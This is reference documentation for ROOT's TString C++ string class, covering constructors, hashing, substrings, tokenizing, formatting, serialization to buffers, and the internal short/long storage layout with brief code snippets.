initializer is the primary initializer for a class. It must fully initialize all properties introduced by its class before calling a superclass initializer. A class can have more than one designated initializer. Convenience initializer A convenience initializer is a secondary initializer that must call a designated initializer of the same class. It is useful when you want to provide default values or other custom setup. A class does not require convenience initializers Final initializer Failable initializer When } } } Required initialiser: Consider the following example: //required initclass classA { required init() { var a = 10 print(a) } } class classB: classA { required init() { var b = 30 print(b) } } //______________________ let objA = classA() let objB = classB() prints: 10 30 10 //______________________ super.init() The Swift initialization sequence has a little bit difference from Objective-C, class BaseClass { var value : String init () { value = "hello" } } the subclass below. class SubClass : BaseClass { var subVar : String let subInt : Int override init() { subVar = "world" subInt = 2015 super.init() value = "hello world 2015" // optional, change the value of superclass } } The initialization sequence is: - Initialize subclass’s var or let, - Call super.init(), if the class has a super class, - Change value of superclass, if you wanna do that. 100. Types of properties Answer: There are two types of properties in Swift: stored properties and computed properties. Stored properties store values (constant or variable) as part of an instance or type, whereas computed properties don’t have a stored value. Stored Properties Stored properties of constants are defined by the ‘let’ keyword and Stored properties of variables are defined by the ‘var’ keyword. - During definition Stored property provides ‘default value’ - During Initialization the user can initialize and modify the initial values struct Number { var digits: Int let pi = 3.1415 } var n = Number(digits: 12345) n.digits = 67 print("\(n.digits)") print("\(n.pi)") Lazy stored property Swift provides a flexible property called ‘Lazy Stored Property’ where it won’t calculate the initial values when the variable is initialized for the first time. ‘lazy’ Computed Properties Rather than storing the values computed properties provide a getter and an optional setter to retrieve and set other properties and values indirectly.. 101. What is type inference in Swift? 102. Type Alias Answer: A type alias allows you to provide a new name for an existing data type into your program. … They simply provide a new name to an existing type. The main purpose of typealias is to make our code more readable, and clearer in context for human understanding. 103. How to create a typealias? Answer: StudentName to be used everywhere instead of. 104. What is closure? Answer: Closures are self-contained blocks of functionality that can be passed around and used in your code. (unnamed function) ex. completion handler in alomofire 105. @nonescaping and @escaping closure Answer: closure parameters became @nonescaping by default, closure will also be execute with the function body, if wanna escape closure execution mark it as @escaping. 1. @nonescaping closures: (if you are getting value before scope end) When passing a closure as the function argument, the closure gets execute with the function’s body and returns the compiler back. As the execution ends, the passed closure goes out of scope and have no more existence in memory. Lifecycle of the @nonescaping closure: 1. Pass the closure as function argument, during the function call. 2. Do some additional work with function. 3. Function runs the closure. 4. Function returns the compiler back. 2. @escaping closures: (after scope end if scope is again executing after few seconds will have to use escaping ) When passing a closure as the function argument, the closure is being preserve to be execute later and function’s body gets executed, returns the compiler back. As the execution ends, the scope of the passed closure exist and have existence in memory, till the closure gets executed. There are several ways to escaping the closure: - Storage: When you need to preserve the closure in storage that exist in the memory, past of the calling function get executed and return the compiler back. (Like waiting for the API response) - Asynchronous Execution: When you are executing the closure asynchronously on dispatch queue, the queue will hold the closure in memory for you, to be used in future. In this case you have no idea when the closure will get executed. 106. Sandbox Answer: 107. Defer in swift Answer:Order of execution with multiple defer statements If multiple statements appear in the same scope, the order they appear is the reverse of the order they are executed (LIFO). The last defined statement is the first to be executed which is demonstrated by the following example by printing numbers in logical order. func printStringNumbers() { defer { print("1") } defer { print("2") } defer { print("3") } print("4") } /// Prints 4, 3, 2, 1 108. Higher order function Answer: Swift’s Array type has a few methods that are higher order functions: sorted, map, filter, and reduce. Sorted : If we call sorted on an array it will return a new array that sorted in ascending order. like sorting of array of numbers Map : Mapping is similar to sort in that it iterates through the array that is calling it, but instead of sorting it changes each element of the array based on the closure passed to the method. like changing array of numbers to arrays of strings. let houseName:[String] = [“starks” ,”lanniesters” , “targaryens” ,”baratheon” , “arryn”] let mappedHouseCount = houseName.map{$0.count} Characters count of each element in house name :- [6, 11, 10, 9, 5] Filter: filter array according to condition like from array of numbers get array of numbers less that 5 Reduce : The reduce function allows you to combine all the elements in an array. like combine numbers of array and return as string. compactmap() : compact-map is same as the Map function with optional handling capability let compactMapValue = place.compactMap{$0} print(compactMapValue) // here the optionals are removed["winterfell", "highgarden", "Vale", "iron islands", "essos", "andalos"] compactMap is also used to filter out the nil value let arrayWithNil:[String?] = [“eleven” , nil , “demogorgon” , nil , “max” , nil , “lucus” , nil , “dustin”] let filteredNilArray = arrayWithNil.compactMap{$0} print(filterNilArray)print (“Array with nil = \(arrayWithNil.count) and with out nil count = \(filterNilArray.count)”) the printed values are [“eleven”, “demogorgon”, “max”, “lucus”, “dustin”] Array with nil = 9 and with out nil count = 5 109. Diff. between flat and flatmap Answer: So map transforms an array of values into an array of other values, and flatMap does the same thing, but also flattens a result of nested collections into just a single array. let scoreByName = ["henry":[0,5,8], "John":[2,5,8]] let mapped = scoreByName.map {$0.value} print(mapped) // [[0,5,8], [2,5,8]] - array of array let flatMapped = scoreByName.flatmap {$0.value} //[0,5,8,2,5,8] - flattened to only an array 110. What is codable? Answer: Codable: a protocol specifically for archiving and unarchiving data, which is a fancy way of saying “converting objects into plain text and back again.” 111. What is JSONEncoder Answer: This part of the process is powered by a new type called JSONEncoder. Its job is to take something that conforms to Codable and send back that object in JavaScript Object Notation (JSON) – the name implies it’s specific to JavaScript, but in practice we all use it because it’s so fast and simple. 112. What is stack and heap? Answer: 113. What is the difference between aspect fill and aspect fit when displaying an image? Answer: Aspect fit ensures all parts of the image are visible, whereas aspect fill may crop the image to ensure it takes up all available space. 114. What steps do you follow to identify and resolve crashes? Answer : by using Assert, Precondition and Fatal Error in Swift SwiftUI what is “some” in SwiftUI? var body: some View defines a new computed property called body, which has an interesting type: some View. This means it will return something that conforms to the View protocol, but that extra some keyword adds an important restriction: it must always be the same kind of view being returned – you can’t sometimes return one type of thing and other times return a different type of thing. We’ll look at this feature more shortly, but for now just remember that it means “one specific sort of view must be sent back from this property.”
https://sandeshsardardotcom.wordpress.com/2018/04/20/ios-interview-questions/
CC-MAIN-2020-40
refinedweb
11,631
55.03
The Overloaded:Unit is the third and the last of the new features of recent overloaded 0.2.1 release. I wrote about Overloaded:Categories, Overloaded:Do previously. overloaded package uses source plugins to reinterpret syntax in different ways. Overloaded:Unit is (hopefully) clearly a tongue-in-cheek feature. What we can do? We can overload what () means. Without any overloading we have () :: (). With {-# OPTIONS_GHC -fplugin=Overloaded #-} we can make that symbol anything. The most sensible overloading is into boring. You can specify that by {-# OPTIONS_GHC -fplugin=Overloaded -fplugin-opt=Overloaded:Unit=Data.Boring.boring #-} What is boring? Haddock tell us. There is also a law. -- | 'Boring' types which contains one thing, also -- 'boring'. There is nothing interesting to be gained by -- comparing one element of the boring type with another, -- because there is nothing to learn about an element of the -- boring type by giving it any of your attention. -- -- /Boring Law:/ -- -- @ -- 'boring' == x -- @ -- class Boring a where boring :: a The above is a "proper implementation" of Conor McBride StackOverflow answer to What does () mean in Haskell -question The answer starts with () means "Boring". So don't blame me for Overloaded:Unit, it wasn't my idea :) The overloaded library by default makes () mean nil. Lispers may agree with that choice. Another choice is to make () mean def from lawless Default type class. As def is used as ad-hoc value for default options, we could write () & axis_line_style . line_width .~ 2 or () { _line_width = 2 , _line_color = red } Is that a good idea? Who am I to judge! When you work with compiler internals, or more generally into implementation of some specification, you often enough learn stuff you didn't think about. Formalization makes corner cases more visible. One example is: Prelude> ( ) () Try in your GHCi prompt if you don't believe me. This leads to a question: Why unit have been given special syntax in the first place? Why could we had data Unit = Unit Then there would been a StackOverflow question for Conor to answer! And we could use boring, def or Unit. Those would be "overloadable" with custom preludes, i.e. basic language feature: swapping imports. We can think about () as 0-tuple. But the syntax is not consistent: () -- 0-tuple i.e. unit (x) -- just x i.e. NOT 1-tuple (x,y) -- 2-tuple i.e. pair (x,y,z) -- 3-tuple i.e. triple Yet, there is 1-tuple in GHC. Kind-of. Prelude Language.Haskell.TH> let x = 'x' x :: Char Prelude Language.Haskell.TH> print $( conE (tupleDataName 1) `appE` [| x |] ) <interactive>:12:7: error: • Exception when trying to run compile-time code: tupleDataName 1 CallStack (from HasCallStack): error, called at libraries/template-haskell/Language/Haskell/TH/Syntax.hs:1236:19 in template-haskell:Language.Haskell.TH.Syntax Code: conE (tupleDataName 1) `appE` [| x |] • In the untyped splice: $(conE (tupleDataName 1) `appE` [| x |]) I haven't tried to that using GHC internals, whether one will generate panics by creating 1-tuples (i.e. boxes), or whether it will "just work". data Box a = Box a is valid data-type - and sometimes even useful. We cannot use 1-tuple for it - because there isn't syntax for one, yet we have () for 0-tuple. Such inconsistencies. We need some syntax for tuples however. The parenthesis delimit where tuple starts and ends. The (1, 'x', "foo") is clearly a triple. Without parenthesis 1, 'x', "foo" would be ambiguous, that could be either triple or nested pairs - three options! One could use and to delimit tuples leaving ( and ) only for grouping. But using Unicode for something as central as tuples is not a good idea. So overloading parenthesis is probably the least bad option. But not great. The very evil interview-question would be to ask to list all the ways the dot is overloaded (or will be overloaded) in GHC Haskell. The will be are Local Do and RecordDotSyntax proposals, but we have plenty already. Poor dot, stretched for about everything. Hot take: Disallow . as an operator, making it a punctuation, like comma or semicolon. It feels it would be easier to come up with new function composition operator, than try to disambiguate ever-increasing dot usage. TupleSections. I don't know how divided community is about these. I think that (left,) and (,right) sections are somewhat ok, even I avoid them. The (,) is kind-of an infix operator (which it isn't). Triples and bigger tuples on the other hand... ("foo",,,True) :: b -> c -> ([Char], b, c, Bool) for me this looks like syntax error. But on the other hand, if you are ok with that syntax, it definitely should be overloadable for arbitrary data-types, why stop with tuples. data Foo = Foo String Int Char Bool deriving (Generic, ...) ("foo",,,True) :: Char -> Bool -> Foo Wouldn't that be awesome? Stay tuned for Overloaded:TupleSections.
http://oleg.fi/gists/posts/2020-05-11-overloaded-unit.html
CC-MAIN-2020-24
refinedweb
808
68.67
There are close to 50 different settings that can be configured on a Microsoft DNS server. They range from default scavenging and logging settings to settings that customize the DNS server behavior, such as how zone transfers will be sent to secondaries and whether to round-robin multiple A record responses. The DNS provider is mapped to the root\MicrosoftDNS namespace. A DNS server is represented by an instance of a MicrosoftDNS_Server class, which is derived from the CIM_Service class. Table 27-1 contains all the property methods available in the MicrosoftDNS_Server class. The MicrosoftDNS_Server class also provides a few methods to initiate certain actions on the DNS server. Perhaps two of the most useful are StartService and StopService, which allow you to start and stop the DNS service. Table 27-2 contains the list of methods available to the MicrosoftDNS_Server class The first step in programmatically managing your DNS server configuration is to see what settings you currently have and determine whether any need to be modified. With WMI, it is really easy to list all properties for the server. The following example shows how to do it: Set objDNS = GetObject("winMgmts:root\MicrosoftDNS") set objDNSServer = objDNS.Get("MicrosoftDNS_Server.Name="".""") Wscript.Echo objDNSServer.Properties_.Item("Name") & ":" for each objProp in objDNSServer After getting a WMI object for the DNS provider (root\MicrosoftDNS), we get a MicrosoftDNS_Server object by looking for the "." instance. Since there can only be one instance of MicrosoftDNS_Server running on any given computer, we do not need to worry about multiple objects. After getting a MicrosoftDNS_Server object, we iterate through all the properties of the object and print each one out. Note that we have added special checks for values that contain arrays to print each element of the array. In that case, we use Lbound and Ubound to iterate over all the values for the array. Now that we can see what values have been set on our DNS server, we may want to change some of them. To do so is very straightforward. We simply need to set the property method (e.g., EventLogLevel) to the correct value. This example shows how it can be done: on error resume next Set objDNS = GetObject("winMgmts:root\MicrosoftDNS") set objDNSServer = objDNS.Get("MicrosoftDNS_Server.Name="".""") Wscript.Echo objDNSServer.Name & ":" objDNSServer.EventLogLevel = 4 objDNSServer.LooseWildcarding = True objDNSServer.MaxCacheTTL = 900 objDNSServer.MaxNegativeCacheTTL = 60 objDNSServer.AllowUpdate = 3 objDNSServer.Put_ if Err then Wscript.Echo " Error occurred: " & Err.Description else WScript.Echo " Change successful" end if Note that we had to call Put_ at the end. If we didn't, none of the changes would have been committed. After making changes to DNS settings, you typically will need to restart the DNS service for them to take effect. We can utilize the StopService and StartService methods as shown in the following example to do this: on error resume next Set objDNS = GetObject("winMgmts:root\MicrosoftDNS") set objDNSServer = objDNS.Get("MicrosoftDNS_Server.Name="".""") objDNSServer.StopService if Err Then WScript.Echo "StopService failed: " & Err.Description Wscript.Quit end if objDNSServer.StartService if Err Then WScript.Echo "StartService failed: " & Err.Description Wscript.Quit end if WScript.Echo "Restart successful" Building on the examples we've used so far in this chapter, we can now move forward with writing a robust DNS server configuration check script. A configuration check script can be very important, especially in large environments where you may have many DNS servers. Unless you have a script that routinely checks the configuration on all of your DNS servers, it is very likely that those servers will not have an identical configuration. If this is true, when problems pop up over time, you may end up spending considerably more time troubleshooting because of the discrepancies between the servers. To accomplish the configuration checking, we will store each setting in a VBScript Dictionary object. For those coming from other languages such as Perl, a Dictionary object is the VBScript analog of a hash or associative array. It is not extremely flexible but works well in situations such as what we need. Another option would be to store the settings in a text file and read them into a Dictionary object when the script starts up. Example 27-1 contains the configuration check code. option explicit on error resume next Dim arrServers Dim strUsername, strPassword Dim dicDNSConfig ` Array of DNS servers to check arrServers = Array("dns1.mycorp.com","dns2.my") dicDNSConfig.Add "AllowUpdate", 1 dicDNSConfig.Add "LooseWildCarding", True dicDNSConfig.Add "MaxCacheTTL", 900 dicDNSConfig.Add "MaxNegativeCacheTTL", 60 dicDNSConfig.Add "EventLogLevel", 0 dicDNSConfig.Add "StrictFileParsing", True dicDNSConfig.Add "DisableAutoReverseZones", True Dim arrDNSConfigKeys arrDNSConfigKeys = dicDNSConfig.keys Dim objLocator Set objLocator = CreateObject("WbemScripting.SWbemLocator") Dim x, y, boolRestart For x = LBound(arrServers) to UBound(arrServers) boolRestart = False WScript.echo arrServers(x) Dim objDNS, objDNSServer Set objDNS = objLocator.ConnectServer(arrServers(x), "root\MicrosoftDNS", _ strUserName, strPassword) set objDNSServer = objDNS.Get("MicrosoftDNS_Server.Name="".""") for y = 0 To dicDNSConfig.Count - 1 Dim strKey strKey = arrDNSConfigKeys(y) WScript.Echo " Checking " & strKey if dicDNSConfig.Item(strKey) <> objDNSServer.Properties_.Item(strKey) then objDNSServer.Properties_.Item(strKey).value = dicDNSConfig(strKey) objDNSServer.Put_ boolRestart = True if Err Then WScript.Echo " Error setting " & strKey & " : " & Err.Description Wscript.Quit else WScript.Echo " " & strKey & " updated" end if end if Next if boolRestart then objDNSServer.StopService if Err Then WScript.Echo "StopService failed: " & Err.Description Wscript.Quit end if objDNSServer.StartService if Err Then WScript.Echo "StartService failed: " & Err.Description Wscript.Quit end if WScript.Echo "Restarted" end if WScript.Echo "" next Besides the use of the Dictionary object, most of the script is a combination of the other three examples shown so far in this chapter. We added a server array so that you can check multiple servers at once. Then for each server, the script simply checks each key in the Dictionary object to see whether the value for it matches that on the DNS server. If not, it modifies the server and commits the change via Put_. After it's done looping through all the settings, it restarts the DNS service if a change has been made to its configuration. If a change has not been made, it proceeds to the next server. One enhancement that would make the process even more automated would be to dynamically query the list of DNS servers instead of hardcoding them in an array. You simply would need to query the NS record for one or more zones that your DNS servers are authoritative for. As long as an NS record is added for each new name server, the script would automatically pick it up in subsequent runs. Later in the chapter, we will show how to query DNS with the DNS provider.
http://etutorials.org/Server+Administration/Active+directory/Part+III+Scripting+Active+Directory+with+ADSI+ADO+and+WMI/Chapter+27.+Manipulating+DNS/27.2+Manipulating+DNS+Server+Configuration/
CC-MAIN-2018-30
refinedweb
1,110
59.5
Back In java, how can I parse json text to get value of variables like post_id ? Here is my json text { "page": { "name": "tommas", }, "posts": [ { "post_id": "123456789012_123456789012", "actor_id": "1234567890", "name": "Alex", "message": "Nice!", "likes_count": "3", "time": "1234567890" } ]} { "page": { "name": "tommas", }, "posts": [ { "post_id": "123456789012_123456789012", "actor_id": "1234567890", "name": "Alex", "message": "Nice!", "likes_count": "3", "time": "1234567890" } ]} JSON basically stands for JavaScript Object Notation. It is simply a format in which in which you can transfer data from client to server and vice versa. In the initial days of web development we used to work with HTML later with CSS as it all evolved, as it evolved we had more dynamic web pages, what it meant was we had different operating languages on both ends and complex strings which need to be communicated needed to be transferable to both ends, which is when JSON came in. JSON is a lightweight, text-based, language-independent data exchange format which is used for the purpose. Parsing JSON in java We assume here we want to parse some data from server side to client side. Passing JSON is much easier if let’s say we are operating in JavaScript, but if we are using it in some other language ( Java in our case) we need to take help of certain libraries in order to convert normal text to JSON format first on the client side and parse it to client side and again convert it to normal text using libraries. Library which is commonly used are gson, jackson all these are available and can be used to convert java code into Json and vice versa. We will use org.json library here, import org.json.*;JSONObject obj = new JSONObject(" .... ");String name = obj.getJSONObject("page").getString("name");JSONArray arr = obj.getJSONArray("posts");for (int i = 0; i < arr.length(); i++) { String id = arr.getJSONObject(i).getString("post_id"); ...... } import org.json.*; JSONObject obj = new JSONObject(" .... "); String name = obj.getJSONObject("page").getString("name"); JSONArray arr = obj.getJSONArray("posts"); for (int i = 0; i < arr.length(); i++) { String id = arr.getJSONObject(i).getString("post_id"); ...... } Let's assume you have a class called Person with just name as an attribute. For example: private class Person { public String name; public Person(String name) { this.name = name; }} private class Person { public String name; public Person(String name) { this.name = name; } } Do you want to learn Java end to end! Here's the right video for you: For the serialization/de-serialization of objects, you can do this: Gson g = new Gson();Person person = g.fromJson("{\"name\": \"John\"}", Person.class);System.out.println(person.name); //JohnSystem.out.println(g.toJson(person)); // {"name":"John"} Gson g = new Gson(); Person person = g.fromJson("{\"name\": \"John\"}", Person.class); System.out.println(person.name); //John System.out.println(g.toJson(person)); // {"name":"John"} If you want to get a single attribute out you can do it easily with the Google library as well, do like this: JsonObject jsonObject = new JsonParser().parse("{\"name\": \"John\"}").getAsJsonObject();System.out.println(jsonObject.get("name").getAsString()); JsonObject jsonObject = new JsonParser().parse("{\"name\": \"John\"}").getAsJsonObject(); System.out.println(jsonObject.get("name").getAsString()); But, if you don't need object de-serialization but to simply get an attribute, you can try org.json JSONObject obj = new JSONObject("{\"name\": \"John\"}");System.out.println(obj.getString("name")); ObjectMapper mapper = new ObjectMapper();Person user = mapper.readValue("{\"name\": \"John\"}", Person.class);System.out.println(user.name); JSONObject obj = new JSONObject("{\"name\": \"John\"}"); System.out.println(obj.getString("name")); ObjectMapper mapper = new ObjectMapper(); Person user = mapper.readValue("{\"name\": \"John\"}", Person.class); System.out.println(user.
https://intellipaat.com/community/501/how-to-parse-json-in-java
CC-MAIN-2021-43
refinedweb
594
50.94
Lars Marius Garshol wrote: > > ... > > I have been wondering why we even have Attribute nodes in the DOM tree > at all. They are mainly useful for representing entity references in > attribute values, something that is very rarely useful. :-) Attributes can also be independently addressed as objects in XPath, XSLT, Schematron, etc. > So I think there would be definite performance benefits (in terms of > both speed and memory use) in keeping a dictionary of names -> string > values instead of names -> nodes. I did that in older versions of minidom. Then I implemented namespaces and it started to get really hairy. You need to be able to look things up by tagname and localname/URI prefix. Then you need to be able to get from tagnames to localname/URI and back in case you need to delete or update an attribute. The right hand side become some kind of a tuple that you need to split and you are almost back to objects again...ugh. In general, namespaces make XML a lot harder to work with. A lot harder. Really. So I eventually backed it out on the argument that getting it right but inefficient for Python 1.6 was more important than being tricky but efficient. The idea is still good but it requires more thought. >. -- Paul Prescod - ISOGEN Consulting Engineer speaking for himself Floggings will continue until morale improves.
https://mail.python.org/pipermail/xml-sig/2000-June/002583.html
CC-MAIN-2017-39
refinedweb
228
74.19
In what follows, fCap is the length of the underlying representation vector. Hence, the capacity for a null terminated string held in this vector is fCap-1. The variable fSize is the length of the held string, excluding the terminating null. The algorithms make no assumptions about whether internal strings hold embedded nulls. However, they do assume that any string passed in as an argument that does not have a length count is null terminated and therefore has no embedded nulls. The internal string is always null terminated. Copy a TSubString in a TString. Special constructor to initialize with the concatenation of a1 and a2. Private member function returning an empty string representation of size capacity and containing nchar characters. Assign a TSubString substr to TString. Return a case-insensitive hash value (endian independent). Calculates hash index from any char string. (static function)String::Hash(string,nstring); For int: i = TString::Hash(&intword,sizeof(int)); For pointer: i = TString::Hash(&pointer,sizeof(void*)); V.Perev Return a substring of self stripped at beginning and/or end. Check to make sure a string index is in range. Calculate a nice capacity greater than or equal to newCap. Make self a distinct copy with capacity of at least tot, where tot cannot be smaller than the current length. Preserve previous contents. Read string from I/O buffer. Read TString object from buffer. Simplified version of TBuffer::ReadObject (does not keep track of multiple references to same string). We need to have it here because TBuffer::ReadObject can only handle descendant of TObject. Write TString object to buffer. Simplified version of TBuffer::WriteObject (does not keep track of multiple references to the same string). We need to have it here because TBuffer::ReadObject can only handle descendant of TObject Set default initial capacity for all TStrings. Default is 15. Set default resize increment for all TStrings. Default is 16. Set maximum space that may be wasted in a string before doing a resize. Default is 15. Return sub-string of string starting at start with length len. Return floating-point value contained in string. Examples of valid strings are: 64320 64 320 6 4 3 2 0 6.4320 6,4320 6.43e20 6.43E20 6,43e20 6.43e-20 6.43E-20 6,43e-20 This function is used to isolate sequential tokens in a TString. These tokens are separated in the string by at least one of the characters in delim. The returned array contains the tokens as TObjString's. The returned array is the owner of the objects, and must be deleted by the user. Formats a string using a printf style format descriptor. Existing string contents will be overwritten. Formats a string using a printf style format descriptor. Existing string contents will be overwritten. { char s[32]; sprintf(s, "%ld", i); return operator+=(s); } { char s[32]; sprintf(s, "%lu", i); return operator+=(s); } { return ReplaceAll(s1.Data(), s1.Length(), s2.Data(), s2.Length()) ; } { return ReplaceAll(s1.Data(), s1.Length(), s2, s2 ? strlen(s2) : 0); } { return ReplaceAll(s1, s1 ? strlen(s1) : 0, s2.Data(), s2.Length()); } { return ReplaceAll(s1, s1 ? strlen(s1) : 0, s2, s2 ? strlen(s2) : 0); } { return GetPointer()[i]; } { return GetPointer()[i]; } { AssertElement(i); return GetPointer()[i]; } { AssertElement(i); return GetPointer()[i]; } { return (s + (kAlignment-1)) & ~(kAlignment-1); } { return Bool_t(fRep.fShort.fSize & kShortMask); } { fRep.fShort.fSize = (unsigned char)(s << 1); } { return fRep.fShort.fSize >> 1; } { fRep.fLong.fSize = s; } { return fRep.fLong.fSize; } { IsLong() ? SetLongSize(s) : SetShortSize(s); } { return fRep.fLong.fCap & ~kLongMask; } { fRep.fLong.fData = p; } { return fRep.fLong.fData; } { return fRep.fLong.fData; } { return fRep.fShort.fData; } { return fRep.fShort.fData; } { return IsLong() ? GetLongPointer() : GetShortPointer(); } { return IsLong() ? GetLongPointer() : GetShortPointer(); } Type conversion { return GetPointer(); } { return (IsLong() ? GetLongCap() : kMinCap) - 1; }
http://root.cern.ch/root/html530/TString.html
crawl-003
refinedweb
624
54.69
Comparing YUI Compressor and slimmer 17 November 2009 Python YUI Compressor apparently supports compressing CSS. Cool! I had to try it and what's even more cool is that it's the only other CSS minifier/compressor that doesn't choke on CSS hacks (the ones I tried). The only other CSS minifier/compressor is my very own slimmer. So, let's see what the difference is. Running the YUI Compressor 10 times on a relatively small file takes 0.3 seconds on average. Running the same with python 2.6 and slimmer.css_slimmer takes 0.1 seconds on average. I think most of this time is spent loading the jar file than the actual time of running the compression. Here's how I ran yuicompressor: $ time java -jar yuicompressor-2.4.2.jar --type css tricky.css > compressed.css And for slimmer I first had to write a script: from slimmer import css_slimmer import sys print css_slimmer(open(sys.argv[1]).read()) And run it like this: $ time python slim.py tricky.css > slimmed.css If part of a build system, 0.3 or 0.1 seconds don't matter. YUI Compressor has the added advantage that it's popular which means many eyes on it for submitting bug reports and patches. However, if you're already in Python and don't want to depend on manually downloading the jar file and running a subprocess then slimmer is probably a better choice. I think you left out Google's Closure compiler, which explicitly states "The Closure Compiler reduces the size of your JavaScript files and makes them more efficient, helping your application to load faster and reducing your bandwidth needs." Whoops, you're talking about CSS, not JavaScript. Should have read the post. D'oh. Hey Peter - might want to fix the note on slimmer's PyPI page that proudly claims "still maintained in 2008." It no longer gives the impression of up-to-dateness it might once have done ;-) Thanks for noticing. Done Would you post the "tricky.css"? Wonder ig yuicompressor and slimmer will actually cope with any css hack out there (especially syntactically invalid ones... ;). That would be nice, thanks
http://www.peterbe.com/plog/comparing-yui-compressor-and-slimmer
CC-MAIN-2014-42
refinedweb
364
68.16
To all who are geting NZEC, try using this format in java: import java.io.*; import java.util.*; public class Main { public static void main(String[] args) throws IOException { try{ //Your Solve }catch(Exception e){ return; } } } To all who are geting NZEC, try using this format in java: import java.io.*; import java.util.*; public class Main { public static void main(String[] args) throws IOException { try{ //Your Solve }catch(Exception e){ return; } } } but if it throws an exception then it will not execute the code…then u’ll get a WA…it is better if u check if your input format is correct…i.e while using bufferedReader and specially while using the readLine() function…also u should take care array out of bounds excep…the above format will only help to find where the error is occurring and that to only if u have the specific cases…as the example cases or many small cases may pass… NO actually you see, it’s not like that! That’s the convention how you write it at the beginning at the function. It’s a built-in exception class. The way I coded is similar to something like below and both means the same, just different convention or writing practice- public static void main(String[] args { try{ //Your Solve }catch(IOException e){ System.err.println(e.getMessage()); return; } } My code runs well in my laptop but gets Runtime Error (NZEC) while submitting it… Why it is so ? I have a code that is correct but giving NZEC when submitted. How can i post the code i wrote for discussing it with others? One thing I’ve noticed is using string tokenizer to parse input is always better than using split function. The latter many times lead to IOException/NZEC. please check your solution, sometimes it is just because of your solution is giving wrong answer, try all possible cases as you can. I faced it recently and have gone through all possible cases and got to know that one of test case was failing and after changing my code accordingly, codechef has accepted my solution:) please post ur code NZEC means “Non zero exit code”. Its essentially saying that your program ran into some error during execution. Mostly, it comes up when there is a Segmentation Fault. The SegFault can be caused by many things, but experience says it is mainly through two causes: (a) Infinite Recursion - or basically when you run out of stack memory. (b) Incorrect Memory Access - or whenever there is some weird stuff happening with memory allocation / access. C++ isn’t so friendly as Java, and it will not explicitly tell you that you have an “ArrayIndexOutOfBounds Exception”, but will instead try to use the “supposed” memory even if it is outside the block. This makes things a bit hard to debug. If you’re accessing things far out for example. Some sample codes that should give NZEC on Codechef/Spoj: Example 1: DFS void dfs(int u) { visited[u]++; for(int v = 0; v < N; v++) if(adjmat[u][v] == 1) dfs(v); } did that exception thing but my laptop is showing perfectly right answer… in that case where should i start looking error in my code… If you are submitting the code by copying from your IDE, make sure you select the code from import statements not from your package statement. This will also give you NZEC error. Please check your submission. import java.util.*; public class Main{ public static final double BANK_CHARGES = 0.50; public static void main(String[] args) { Scanner console = new Scanner (System.in); System.out.printf("\t\tInput : \n\t\t"); int x = console.nextInt(); double y = console.nextDouble(); check(x,y); y=y-x-BANK_CHARGES; output(y); } public static void check(int x, double y){ if (x%5!=0){ output(y); System.out.printf("\n\t\tIncorrect Withdrawble Amount (not multiple of 5)\n\n"); throw new IllegalArgumentException( ); } else if ((y-x-BANK_CHARGES)<0){ output(y); System.out.printf("\n\t\tInsufficient Fund\n\n"); throw new IllegalArgumentException(); } } public static void output(double y){ System.out.printf("\n\t\tOutput :\n\t\t%.2f",y); } } NZEC error … This code runs well in my laptop but gets Runtime Error (NZEC) while submitting it import java.util.*; class Main { public static void main (String arg[]) { Scanner scan = new Scanner(System.in); int n = scan.nextInt(); int arr[] = new int[n]; for(int i=0;i<n;++i) { arr[i] = scan.nextInt(); } System.out.println(rec(arr,n)); } public static int rec(int arr[],int n){ if(n==0){ return 0; } if(n==1){ return arr[0]; } if(n==2) { if(arr[0]<arr[1]) return arr[0]; else return arr[1]; } int mat[] = new int[n]; mat[0] = arr[0]; mat[1] = arr[1]; mat[2] = arr[2]; for(int i=3;i<n;++i) { mat[i]=arr[i]+min(mat[i-1],mat[i-2],mat[i-3]); } return min(mat[n-1],mat[n-2],mat[n-3]); } public static int min(int a,int b,int c){ if(a<=b && a<=c){ return a; }else if(c<=b && c<=a){ return c; } else{ return b; } } } This code runs well in my laptop but gets Runtime error(NZEC) while submitting, please help. I DONT UNDERSTAND WTF IS WRONG IN MY CODE ITS PERFECTLY WORKING ON JDK 9 AND CODECHEF IS SAYING IT HAS NZEC RUNTIME ERROR /* /** * @author Aashlesh Dhumane */ public class Main { /** @param args the command line arguments @throws java.lang.Exception */ public static void main(String[] args) throws Exception { // TODO code application logic here int n; int i,j,k,l; System.out.println(“enter the test cases”); String str; BufferedReader b = new BufferedReader (new InputStreamReader(System.in)); str=b.readLine(); n=Integer.parseInt(str); // for (i=0;i<n;i++) // { while (n>0) { str=b.readLine(); i=Integer.parseInt(str); str=b.readLine(); j=Integer.parseInt(str); str=b.readLine(); k=Integer.parseInt(str); str=b.readLine(); l=Integer.parseInt(str); if ((i==j && k==l) || (j==k && l==i) || (i==k && j==l) ) {System.out.println("YES"); } else { System.out.println("NO"); } n--; } } } Try using fast I/O given in geeksforgeeks.com . If the error still persists, get back to us. Alright I don’t seem to have a high enough Karma or something to ask a separate question so I thought I’d post it here since the topic is related. I keep getting an NZEC error at the spot I marked by a comment in my code when running it on the online IDE set to the problem CHEFCHR (I’m aware the contest is still going on which is why I omitted specific code to prevent illegal use): /* package codechef; // don't place package name! */ import java.util.*; import java.lang.*; import java.io.*; /* Name of the class has to be "Main" only if the class is public. */ class Codechef { public static void main (String[] args) throws java.lang.Exception { Scanner sc = new Scanner(System.in); int cases = sc.nextInt(); //THE NZEC ERROR IS HAPPENING HERE for(int i = 0;i < cases;i++) { String s = sc.next(); /* Omitted code for sake of confidentiality since the contest is still running */ } } }:14) When I run this code in my ide (NetBeans), I’m fine and everything works perfectly. When I run it on the online IDE with custom input, everything is fine as well. When I run it with the CHEFCHR input, I’m given an NZEC error. When I’ve been submitting, it’s been telling me my code gives the wrong answer. Even if I run LITERALLY ONLY the code below, I get the same exact NZEC error: import java.util.*; import java.lang.*; import java.io.*; class Codechef { public static void main (String[] args) throws java.lang.Exception { Scanner sc = new Scanner(System.in); int cases = sc.nextInt(); } }:11) What am I doing wrong if even just calling for scanner to read in an integer is giving me an error? Further example of the absolute insanity going on right now: A proven AC solution to a practice problem: Me copying and pasting that EXACT same code into the online IDE and submitting the solution to that SAME EXACT practice problem: Both programs are EXACTLY the same. No alterations. Both are answering the same question. Yet one is right and one is wrong. Plz help, I’m losing my marbles. post your code using “code” html tag or link your code. I am facing the same problem. I have used Scanner class for input and i am getting the error in the exact same line. I have tried the try-catch block. The NZEC problem still persists. Please help.
https://discusstest.codechef.com/t/how-to-get-rid-of-getting-nzec-error-while-submitting-solution-in-java/2826
CC-MAIN-2021-31
refinedweb
1,455
62.48
